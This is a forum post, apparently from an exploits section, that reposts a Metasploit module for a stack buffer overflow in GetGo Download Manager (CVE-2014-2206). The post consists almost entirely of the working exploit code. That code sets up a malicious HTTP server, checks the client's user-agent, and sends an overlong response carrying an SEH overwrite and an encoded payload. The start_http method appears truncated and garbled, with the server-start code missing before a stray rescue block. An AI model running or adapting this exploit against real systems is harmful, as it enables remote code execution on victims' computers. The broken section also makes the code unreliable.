Jump to content
Aerosol

GetGo Download Manager HTTP Response Buffer Overflow

By Aerosol, in Exploituri

Recommended Posts

Aerosol Newbie

Aerosol

Posted
Posted 

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Seh
  include Msf::Exploit::Remote::HttpServer

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'GetGo Download Manager HTTP Response Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack-based buffer overflow vulnerability in
        GetGo Download Manager version 4.9.0.1982 and earlier, caused by an
        overly long HTTP response header.
        By persuading the victim to download a file from a malicious server, a
        remote attacker could execute arbitrary code on the system or cause
        the application to crash. This module has been tested successfully on
        Windows XP SP3.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Julien Ahrens',  # Vulnerability discovery
          'Gabor Seljan'    # Metasploit module
        ],
      'References'     =>
        [
          [ 'EDB', '32132' ],
          [ 'OSVDB', '103910' ],
          [ 'CVE', '2014-2206' ],
        ],
      'DefaultOptions' =>
        {
          'ExitFunction' => 'process',
          'URIPATH'      => "/shakeitoff.mp3"
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          'BadChars'   => "\x00\x0a\x0d",
          'Space'      => 2000
        },
      'Targets'        =>
        [
          [ 'Windows XP SP3',
            {
              'Offset' => 4107,
              'Ret'    => 0x00280b0b  # CALL DWORD PTR SS:[EBP+30]
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Mar 09 2014',
      'DefaultTarget'  => 0))
  end

  #
  # Handle the HTTP request and return a response.
  # Code borrowed from: msf/core/exploit/http/server.rb
  #
  def start_http(opts={})
    # Ensture all dependencies are present before initializing HTTP
    use_zlib

    comm = datastore['ListenerComm']
    if (comm.to_s == "local")
      comm = ::Rex::Socket::Comm::Local
    else
      comm = nil
    end

    # Default the server host / port
    opts = {
      'ServerHost' => datastore['SRVHOST'],
      'ServerPort' => datastore['HTTPPORT'],
      'Comm'       => comm
    }.update(opts)

    # Start a new HTTP server
    @http_service = nil
    rescue
    end
  end


  def on_request_uri(cli, request)

    print_status("Client connected...")

    unless request['User-Agent'] =~ /GetGo Download Manager 4.0/
      print_error("Sending 404 for unknown user-agent")
      send_not_found(cli)
      return
    end

    sploit  = rand_text_alpha(target['Offset'])
    sploit << "\x90\x90\xEB\x06"
    sploit << [target.ret].pack('V')
    sploit << payload.encoded

    print_status("Sending #{sploit.length} bytes to port #{cli.peerport}...")

    resp = create_response(200, sploit)
    resp.body = ""
    cli.send_response(resp)

    close_client(cli)

  end
end

Source

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...